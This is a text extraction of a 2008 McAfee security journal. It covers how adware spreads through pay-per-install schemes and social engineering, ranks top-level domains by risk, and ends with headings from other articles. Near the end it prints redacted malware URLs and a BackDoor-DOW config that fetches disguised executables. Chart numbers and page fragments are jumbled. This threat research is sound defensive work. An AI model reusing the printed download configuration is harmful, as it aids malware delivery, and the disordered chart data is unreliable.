Figure 1: Adware growth reached its peak in 2005. (Source: McAfee Avert Labs).
Spyware and monitoring software 300
compensation Models and caveats

adware and spyware use two major compensation models for online advertisements. Both models work well in a perfect world, but how do they fare in a world that includes people with malicious intent? lets take a look at how these models can be exploited.
250 200 150 100 50 0 2000 2001 2002 2003 2004 2005 2006 2007
forecast
Pay-per-install: The client-side model.
2008
In the pay-per-install (PPI) model, companies selling products or services pay the adware provider to display ads. The adware provider in turn pays individuals or affiliates to distribute its adware using bundling or other means. (Zangocash, for example, pays from $0.75 to $1.45 in the United states for each piece of adware installed.4) The software finally has to be installed on the client machine. The PPI model normally tracks installations of software by using a particular referrer. so, if john Doe hosts a PPI-based adware installer on his web site and some other user downloads and installs that software via the site, john will receive a certain amount of money. To increase the downloads from his site, john might try to increase traffic using attention-getting content such as catchy titles, adult images or videos, free games, or ringtones.
Spyware Monitoring programs
Figure 2: Spyware and monitoring programs have also seen a general decline since 2005, but we anticipate an upturn in the latter in 2008. (Source: McAfee Avert Labs).
Fall 2008
39
The PPI model of compensation proved very lucrative for programmers as well as for people with malicious intentthus contributing to the fantastic growth of adware and spyware. Many installation vectors support this model. These vectors can be broadly divided into two categories:
To better mitigate the attack vectors exploiting these compensation models, lets take a brief overview of how social engineering plays a role in this online market of endless revenue-generation possibilities.
Social engineering This requires user interaction and relies on the user to install and, in some cases, even propagate the software. The number of social engineering methods is limited only by the imaginations of attackers, who can often lure even the most vigilant users. In the example of john Doe, offering free games or ringtones is bait that many people cannot resist. Ultimately, the user decides to take the risk or leave the free goodies on the table. Exploits Installation of adware through exploits may not require any human interaction at all; however, in many cases the user is lured by social engineering techniques to malicious web sites that host these exploits.
social Engineering aspects

Hackers are going to go after the weakest link in the security chain, which is always the people. Kevin Mitnick (2007)11 regardless of the model adware developers use, their primary success factor is users. In our example of john Doe, people were infected because they visited the malicious web site driven by Does social engineering tactics. one reason social engineering is frequently successful is because many people trust what they see and are, by nature, not suspicious of certain online activities. Malicious social engineers know how to exploit human nature. a case study conducted by the U.s. Department of the Interior, points out that 84 percent of government departments attribute various security breaches to human error; 80 percent of the departments attribute these errors to a lack of security training, security knowledge, or failure to follow procedures.12 Hundreds of thousands of malware use social engineering to get installed on users machines: this is one of the most common vectors of malware delivery. Matthew Braveman categorizes various installation vectors in four major categories.13 according to his study, almost one-third of the malware was installed by leveraging social engineering methods. adware and spyware have adopted many popular social engineering methodologies and have come up with new techniques to distribute their software. social engineering is the favored installation vector of the PPI model, which offers broader options for delivering adware and spyware. These applications can be delivered using apparently innocuous mechanisms, such as bundled freeware or by suspicious mechanisms, such as spam or email attachments with deceptive text. a user who wants freeware, for example, can knowingly install adware to use the free services. Even if an installation occurs via an exploit or direct spam, security companies may still not determine that the software is malicious because of vendor claims that they have no role in this distribution and that other people are exploiting their software.
Pay-per-click: The server-side model.6

The pay-per-click (PPc) model has two variations: sponsored ads and content-based ads. The PPc model does not require any adware or spyware software to be installed on the users system, but the model may depend on the users input for contextfor example, from search engine resultsto provide relevant ads. google content-based ads, for example, work by using the PPc model. some of most common delivery mechanisms for PPc content are:
Banner ads ads are shown within a banner or predefined space. This content can change. Pop-up or pop-under ads ads are delivered in separate windows, creating an annoying user experience. Flash-based ads These are similar to banner ads but use flash animation to vary the ad content.
The PPc model can work in a much more controlled environment, in which in the web site hosting these ads may choose the delivery mechanism. although the PPc model is server based and would seem more secure, its not entirely foolproof. scammers can still use deceptive practices to trick users.7 Because most of the ad content is stored on servers and uses javascript, Flash, and other rich-content technologies, inserting malicious ads in the ad stream is not difficult.8, 9 In one such case, a Yahoo-owned ad network unknowingly distributed malicious banner ads that eventually downloaded Trojans on users machines. In this particular scenario, banner ads were shown on web sites such as Myspace and PhotoBucket. These malicious ads were slipped into Yahoos ad network undetected. Weve also seen user clicks hijacked by Dns cache poisoning.10 However, users are not directly affected in these cases; the IsP or server hosting the ads is more vulnerable to these threats.
Because most of the ad content is stored on servers and uses JavaScript, Flash, and other rich-content technologies, inserting malicious ads in the ad stream is not difficult.
40
Social networking web site high trust level Search engine low trust level User Link received via IM, email, spam lowest trust level Link received via friends profile in social networking site, Google notebook, trusted domain, etc. high trust level
Social engineering web site (e.g., offering free MP3 links, adult video, etc.)
Figure 3: Several vectors expose users to unwanted and malicious programs.
Its about trust

Figure 3 depicts four scenarios for user exposure to a social engineering site. although the illustration is simple, it can help us understand the following real-world cases. The key is that the higher the trust level, the more likely a particular social engineering technique will succeed. Well explain further using three brief case studies.
Case 2: Banner ads

Banner ads lie in the domain of the PPc model. The trust level in these real-world scenarios was very high, as users were visiting trusted site that they visited frequently.
Case 1: Social networking web sites

social networking sites are a boon to social engineers because most people on these sites are looking to make or stay in touch with friends. social engineers may create relationships to increase the trust factor, as shown at the top of Figure 3. The trust level is usually very high for this category. a number of notable social engineering attacks have exploited this trust to install adware on users machines:
In 2006, The Washington Post reported a malicious banner ad in Myspace that served adware as well as Trojans to millions of users using Microsoft Windows Metafile exploits; this did not require any user intervention.17 In 2008, weve seen an increase in malicious banner ads. The latest at the time we wrote this article was a Flash-based ad at usatoday.com.18 just by visiting the page, users were socked with multiple malware as well as fake alerts (a popular social engineering tactic) to download a rogue antispyware application called Malware alert. (rogue programs can include PUPs as well as Trojans.)
Myspace adult content viewer (trust level: medium). This incident relied on a user clicking a pop-up ad featuring young people with title such as I want to be loved.14 clicking on these ads downloaded the Myspace adult content software that reportedly downloaded adware. Myspace Fraudulent YouTube Video (trust level: high). Websense reported in late 2006 a fraudulent YouTube video that was posted on multiple fake profiles at Myspace.15 attempting to view the video required installing Zango cash. Facebook secret crush application (trust level: very high). In january 2008, Fortinet generated an advisory about a malicious widget called secret crush that was trying to install adware.16 This social engineering tactic worked by first sending a Facebook request with the title 1 secret crush invitation. Upon opening this request, the user had to install a widget to find out who sent the secret crush. The request further prompted the user to forward it to five friends before it would display who sent the crush. nave users forwarded this message to friends, making this a social worm. after taking these steps all that users saw was a message to download adware Zango. Victims were easily lured by this scenario because the trust level was very high.
Case 3: Other intriguing tactics
spoofed email (trust level: low). In one case, spoofed emails from eBay were spammed with the links pointing to download adware.19 The social engineering aspect occurred in the content of the email, which warned unsuspecting users that there was a problem in their billing information and that they needed to update the data by downloading particular software. Fake error pages (trust level: medium). certain web sites displayed fake page not found error messages and offered to resolve the situation by downloading an activeX component that installed WinFixer.20 google notebook spam (trust level: high). In a recent development, scammers used yet another social engineering technique by spamming links to google notebook pages.21 The hyperlink is in the format www.google.com/notebook/public/[UserID]/ [blocked]. The domain google.com makes people less suspicious and encourages them to click on the malicious web pages, which host multiple links to adult sites or fake videos. These eventually download various rogue anti-spyware apps.
Fall 2008
41
a silent retreat
The initial lack of laws regulating adware and spyware applications gave lots of freedom to their developers, whether their motivations were merely financial or actually malicious. at first, users seemed protected because they had EUlas to warn them of any unwanted effects from these applications. But the EUlas were often confusing, incomplete, or unseen. once found, theyre hard to readoften enclosed in tiny windows that display only a few words at a time. With such an effective smokescreen, why have adware and spyware declined? several factors have contributed.
rogue applications
Because malware authors gain easy money using scare tactics, there is an increasing trend to distribute rogue applications and fake alert Trojans, which display bogus error or infection messages. In most cases, the fake alert Trojans are the downloaders of the rogue applications that detect false registry keys and files as malware. sometimes, these rogue applications drop the files just to detect them later; in these cases, the rogue application warrants a Trojan classification (such Trojans are included in Figure 4). We have also observed many cases of adware installed by Trojans. The Downloader-Ua Trojan category is one such family that uses social engineering tactics to download fake programs. Discovered in late 2004, this family employs loopholes in the way Microsoft Windows Media Player uses digital rights management technology by luring users to download specially crafted media files.31 32 In 2008, the same family of Trojan was involved again in luring users to download a fake MP3 player to play a canned selection of songs; it also downloaded heaps of adware to their systems.33 The growth of rogue applications (PUPs and Trojans) has been exponential in 2008 when compared with previous years. (see Figure 4.) To gauge the frequency of rogue anti-spyware products distributed via downloader Trojans, we analyzed a set of IP addresses involved in initiating these downloads. a query executed at domain hosts-files.net returned 158 domains associated with the same IP address.34 (see Figure 5.)
lawsuits Due to an increase in abuses by adware and spyware apps, consumers and other plaintiffs have filed multiple lawsuits against some big distributors.22 23 24 25 26 27 Various court rulings have helped to limit the numbers of adware and spyware. In the settlement against Zango,12 for example, the court requires that Zango monitor its third-party distributors to assure that its affiliates and their sub-affiliates comply with the FTc order. The ruling also bars Zango, directly or through others, from exploiting security vulnerabilities to download software, and requires that it give clear and prominent disclosures and obtains consumers express consent before downloading software onto consumers computers. such orders have helped to weaken the PPI method and have driven ad distributors to clean up their acts.
Public awareness and industry groups The Federal Trade commission has an informative web site 28 that provides tips on how to protect against spyware and how to report abuses. The anti-spyware coalition also offers a lot of information and details about this threat.29 Due to the efforts of these organizations, both consumers and lawmakers have a much better understanding of the issues and rules related to online advertising. This increased awareness has helped to lower the occurrence of these unwanted applications. Bad publicity and potential lawsuits against advertisers having association with adware companies The money that drove the adware and spyware market initially came from advertisers that used adware companies to show the ads. These product and service companies did not at first fully investigate how the adware firms distributed their ads. In a historic settlement published on january 29, 2007,30 the agreement stated that prior to contracting with a company to deliver their ads, and quarterly thereafter, the companies must investigate how their online ads are delivered. The companies must immediately cease using adware programs that violate the settlement agreements or their own adware policies. Because advertisers now understand the risks (invasion of privacy, improper consent, and others) associated with the PPI model, they are moving toward the PPc model, which requires no applications on users systems.
Rogue applications
1000 500 0
2005
2006
2007
forecast
2008
PUP Trojan
Figure 4: Unlike adware and spyware, rogue applications (PUPs and Trojans) have increased dramatically in 2008. (Source: McAfee Avert Labs).
42
conclusion
looking solely at an analysis of statistics suggests that the growth of adware and spyware is on the decline. However, the intriguing social engineering tactics that are used to distribute these PUPs are still with us, delivering rogue applications and Trojans. With the increase of the server-side model (PPc) of ad delivery, we will certainly see improved social engineering tactics luring users to click on these ads and generate revenue for the affiliates. The distribution of adware and Trojans will continue to gain ground at social networking sites. although the overall number of adware and spyware has declined, we see no easy solution in the near future to the problem of unwanted programs. Because adware companies pay for such installations, their moral duty should be to keep track of each installation and quickly stop any potential misdistribution of their software. But will they really do this? With the changing threat landscape and the increase in revenue-motivated Trojans, we have to remain vigilant and train employees and home users to better understand the threat of social engineering.
Figure 5: Multiple hostnames map to a single IP address that distributes localized rogue applications.
Each of the domains shown in Figure 5 displays either a custom rogue anti-spyware or rogue system cleaner product. The pages appear in various languages, as well. In analyzing 620 pages, we found 24 languages used to create both pages and applications that show the threats have spread far beyond English-speaking countries. More than once, a single IP is associated with multiple domains; in some cases we saw up to 200 different domains. one query for the keyword Fsa (which hosts-files.net describes as a class of domains hosting rogue applications) returned close to 3,600 domains distributing rogue applications.35
Aditya kapoor is a senior researcher at Mcafee avert labs. He was introduced to reverse engineering six years ago while researching at the University of louisiana at lafayette for his masters thesis, which focused on a sliding disassembly algorithm to tackle code obfuscation. at Mcafee, Kapoor developed skills in rootkit analysis, byte code comparison, and behavior analysis. He enjoys traveling and studying different cultures and architectures.
ENDNOTES
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 http://www.antispywarecoalition.org/documents/2007glossary.htm optout, gibson research corp. http://www.grc.com/optout.htm http://en.wikipedia.org/wiki/compensation_methods source: Zango web site. http://www.cdt.org/headlines/headlines.php?iid=51 http://www.benedelman.org/news/062907-1.html http://en.wikipedia.org/wiki/compensation_methods#Pay-per-click_.28PPc.29 http://www.benedelman.org/ppc-scams/ http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ http://www.secureworks.com/research/threats/ppc-hijack/ http://www.csc.com/cscworld/012007/dep/fh001.shtml http://www.usgs.gov/conferences/presentations/5socialEngineeringInternal ExternalThreat%20Dudeck.ppt http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-84002550c479f95d/social_Engineering_Modeling.pdf http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/ http://securitylabs.websense.com/content/alerts/1300.aspx http://www.fortiguardcenter.com/advisory/Fga-2007-16.html http://blog.washingtonpost.com/securityfix/2006/07/myspace_ad_served_adware_to_mo.html 18 http://securitylabs.websense.com/content/alerts/3061.aspx 19 http://securitylabs.websense.com/content/alerts/738.aspx 20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-justfile-not-found/ 21 http://www.cantoni.org/2008/06/04/google-notebook-spam 22 http://www.benedelman.org/spyware/nyag-dr/ 23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html 24 http://www.internetlibrary.com/cases/lib_case358.cfm 25 http://blogs.zdnet.com/spyware/?p=655 26 http://www.ftc.gov/opa/2006/11/zango.shtm 27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm 28 http://onguardonline.gov/spyware.html 29 http://www.antispywarecoalition.org/ 30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html 31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html 32 http://vil.nai.com/vil/content/v_130856.htm 33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3srunning-rampant/ 34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches 35 http://hosts-file.net/?s=Browse&f=Fsa
Fall 2008
43
How risky are Top-level Domains?

by David Marcus
Mcafee siteadvisor data shows how risk varies around the world.
In his excellent paper Mapping the Mal Web, revisited, published in the june 2008 issue of Mcafee security Insights,1 our colleague shane Keats thoroughly examined the distribution of malicious web sites across the Internet using data from Mcafee siteadvisor technology. In this day and age, people need to know where it is safe to surf and search. But if the Internet really is a big digital neighborhood, reflective of any big city in the world, which streets are safe to cross? Which domains are riskier than others? Which top-level domain (TlD) has shown the most improvement in safety? Which has shown the least? What search words are riskier than others? Internet users ask themselves these questions more and more. The McAfee Security Journal is dedicated to helping you find those answers by providing data and analysis that helps you make the best decisions possible. In this edition, we summarize recent threat data regarding top-level domains: both generic TlDs.com, .info, .biz, and so onas well as country TlDs.cn, .ru, .br, and others. We look closely not only at the present risk levels of these domains in the americas, Europe, and asia but also at how they have changed over the last year. We ranked each TlD by overall risk and then performed additional analysis of email practices, download safety, and the prevalence of web-based exploits; and we broke out the top twenty top-level domains for each type of risk. The results were striking. risk is not spread equally across the Internet, as this data clearly illustrates. The generic and country domains showed varying types and degrees of risk and dangers. some countries benefited from good email habits yet demonstrated poor download practices. others suffered from hosting exploits or malicious code. We hope these results will help you as you surf. remember to look both ways before crossing the Internet highway! Reading the graphs In the chart labeled Europe, Middle East and africa TlDs ranked by overall risk, youll see in the left-most bar that romaniadomain .roregistered almost seven percent. This means that, according to siteadvisor software, Mcafee has found that almost seven percent of all sites within that top-level domain have suffered from one or more of the threats weve measured: browser exploits, adware/spyware/Trojans/viruses, high-volume commercial email, affiliations with other risky sites, aggressive pop-up marketing, or siteadvisor community reviews or comments. The higher the figure, the greater the risk to users. In addition to an overall figure, weve charted the change in risk from the previous year. The line graph shows that in romania the risk has increased by about one percent, whereas in slovakia, for example, the risk has decreased by about three percent. Positive numbers indicate increased risk compared with the previous year; negative percentages indicate decreased risk.
David Marcus is Director of security research and communications for Mcafee avert labs. He brings avert labs extensive security research to Mcafees customers and the greater security community. Marcus current responsibilities include Pr, media and thought leadership, serving as blogmaster for McAfee Avert Labs Security Blog, as well as being co-host of AudioParasiticsThe Official PodCast of McAfee Avert Labs. He also manages all publications from avert labs, including McAfee Security Journal.
ENDNOTE
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html
44
-0.5% 1.0% 1.5% 2.0% 2.5%
0.0%
0.5%
-10.0%
-1.5%
-1.0%
-4.0% 0.0% 2.0% 4.0% 6.0% 8.0%
-2.0%
0.0%
10.0%
12.0%
14.0%
16.0%
18.0%
20.0%
-8.0% 2.0% 4.0% 6.0% 8.0%
-6.0%
-4.0%
-2.0%
United States .us
Hong Kong .hk Russia .ru Ukraine .ua European Union Iran .ir Spain .es Bulgaria .bg Italy .it France .fr Latvia .lv Poland .pl Hungary .hu Czech Republic .cz Switzerland .ch Belgium .be Turkey .tr Slovakia .sk Israel .il Germany .de R. of China (Taiwan) .tw Tokelau .tk Niue .nu Thailand .th Vanuatu .vu Indonesia .id Malaysia .my New Zealand .nz Singapore .sg Australia .au Japan .jp Lithuania .lt Estonia .ee Austria .at Portugal .pt Netherlands .nl Croatia .hr S. Africa .za United Kingdom .uk Yugoslavia .yu Greece .gr Sweden .se Ireland .ie Denmark .dk Iceland .is Slovenia .si Norway .no Finland .fi P.R. of China .cn Philippines .ph Cocos (Keeling) Is. .cc Samona .ws India .in South Korea .kr Tuvalu .tv Tonga .to Vietnam .vn
Romania .ro
Argentina .ar
Brazil .br
Asia TLDs ranked by overall risk
Mexico .mx
Americas TLDs ranked by overall risk
Chile .cl
Canada .ca
Venezuela .ve
Europe, Middle East, and Africa TLDs ranked by overall risk
Colombia .co
Overall Risk 2008
Change in Risk 20072008 by points
Christmas Is. .cx
Adware/spyware/ Trojan/viruses
Affiliations with other risky sites Browser exploits
Risk criteria used to measure TlDs
SiteAdvisor community reviews/comments
Overall Risk 2008
High volume commercial email
Overall Risk 2008
Aggressive pop-up marketing
Fall 2008
45
10.0%
15.0%
20.0%
25.0%
-0.4% -5.0% 0.0% 0.0% 5.0% 0.2% 0.4% 0.6% 0.8% 1.0% 1.2%
-0.2%
-20.0%
-10.0%
10.0%
20.0%
30.0%
40.0%
50.0%
60.0%
70.0%
0.0%
Top 20 TLDs ranked by exploits
Top TLDs ranked by email practices
Top 20 TLDs ranked by download risk
46
Information .info P.R. of China .cn Hong Kong .hk Network .net Russia .ru South Korea .kr Business .biz R. of China (Taiwan) .tw Commercial .com Samoa .ws Yugoslavia .yu Ukraine .ua Thailand .th Cocos (Keeling) Is. .cc Slovakia .sk Croatia .hr European Union .eu Bulgaria .bg India .in Latvia .lv P.R. of China .cn Italy .it Families/Individuals .name Bulgaria .bg Belgium .be Cocos (Keeling) Is. .cc Tonga .to Tuvalu .tv Network .net Commercial .com United States .us Tokelau .tk Christmas Is. .cx Latvia .lv Israel .il Vietnam .vn Business .biz Samoa .ws Romania .ro Information .info
Overall Risk 2008 Overall Risk 2008 Overall Risk 2008 Change in Risk 20072008 by points Change in Risk 20072008 by points Change in Risk 20072008 by points
Romania .ro
Information .info
Niue .nu
P.R. of China .cn
Russia .ru
Business .biz
Families/Individuals .name
Cocos (Keeling) Is. .cc
Croatia .hr
Tonga .to
Ukraine .ua
Vietnam .vn
India .in
Network .net
Portugal .pt
Samoa .ws
Poland .pl
United States .us
Commercial .com
Hong Kong .hk
Fall 2008
47
Mcafee, Inc. 3965 Freedom circle santa clara, ca 95054 Usa 888 847 8766 www.mcafee.com
Mcafee and/or additional marks herein are registered trademarks or trademarks of Mcafee, Inc. and/or its affiliates in the United states and/or other countries. Mcafee red in connection with security is distinctive of Mcafee brand products. all other registered and unregistered trademarks herein are the sole property of their respective owners. 2008 Mcafee, Inc. all rights reserved. 5001_sec-jrnl_fall08
48

Mcafee Security Journal Fall 2008

Diunggah oleh

Informasi Dokumen

Deskripsi Asli:

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Mcafee Security Journal Fall 2008

Diunggah oleh

Hak Cipta:

Format Tersedia

Security Vision from McAfee Avert Labs Fall 2008

socIal EngInEErIng The Worlds leading security Threat

McAfee Security Journal Fall 2008

like it? Hate it? send your comments to security_journal@mcafee.com.

Mcafee security journal Debuts

The origins of social Engineering

Prometheus: The god of social Engineering?

jacob and rebekahs Phishing attack

McaFEE sEcUrITY joUrnal

samson and Delilah: Espionage for Hire

The First Trojan Horse

Todays Trojan Horse

Viruses and bots Trojans PUPs

McaFEE sEcUrITY joUrnal

Phishing reports In thousands

Unique phishing reports New phishing sites

History of computer security

1978 1980 1982 1983 1984 1986 1988

The movie War Games dramatizes the consequences of hacking

Figure 3: Timeline of significant social engineering events.

History repeats Itself

McaFEE sEcUrITY joUrnal

ask and You Will receive

a Tale of Two Brains

Theories of social Engineering

Triggering cognitive biases

Misdirected mental shortcuts

McaFEE sEcUrITY joUrnal

Causing errors in schemas

McaFEE sEcUrITY joUrnal

social Engineering 2.0: Whats next

Defenses shape attacks

Internet Fraud: a socio-Technical crime

Faking the clicks

BBB complaint case

BBB CASE #569822971

McaFEE sEcUrITY joUrnal

a Prime Target for social Engineering Malware

McaFEE sEcUrITY joUrnal

Why Pick on the olympics?

case study: an olympics Malware attack

Sponsors declaration of responsibility at the 2008 Beijing Olympic Games

McaFEE sEcUrITY joUrnal

http://www1.palms[removed]/ld/v2/loginv2.asp?hi=2wsdf351 &x=0720080510150323662070000000&y=192.168.1.122&t 1=ne http://www1.palms[removed]/ld/v2/votev2.asp?a=7351ws2&s= 0720080510150323662070000000&t1=ne http://www1.palms[removed]/ld/v2/logoutv2.asp?p=s9wlf1&s= 0720080510150323662070000000&t1=ne

C:\Documents and Settings\All Users\DRM\drmv021.lic C:\Documents and Settings\All Users\DRM\avp01.lic

Figure 3: The unencrypted version of BackDoor-DOW.

rogue software and sites

@n11@http://www1.palms[removed]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d 302f7a58aeb1@ @n11@http://www1.palms[removed]/ld/v2/200764.jpg @% SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f fd48c@.

McaFEE sEcUrITY joUrnal

Vulnerabilities in the Equities Markets

Are People Making Money from Patch Tuesday?

McaFEE sEcUrITY joUrnal

Microsoft stock price change from the days open to close

Microsoft open to intraday low

MSFT CHANGE FROM OPEN TO CLOSE

MSFT CHANGE FROM OPEN TO LOW

-0.17% -0.20% -0.43% -0.45% 0.16% 0.37% 0.49% -0.18% -0.40%

0.06% 0.07% -0.12% -0.29% 0.05% 0.15% 0.21% 0.44% 0.51%

0.08% 0.08% -0.08% -0.11% -0.03% -0.01% 0.27% 0.29% 0.26%

-1.35% -1.39% -1.24% -1.58% -1.16% -1.01% -0.91% -1.39% -1.56%

-0.89% -0.90% -1.24% -0.99% -0.81% -0.76% -0.74% -0.78% -0.79%

-0.64% -0.64% -0.36% -0.93% -0.74% -0.68% -0.47% -0.51% -0.54%

MSFT CHANGE FROM OPEN TO HIGH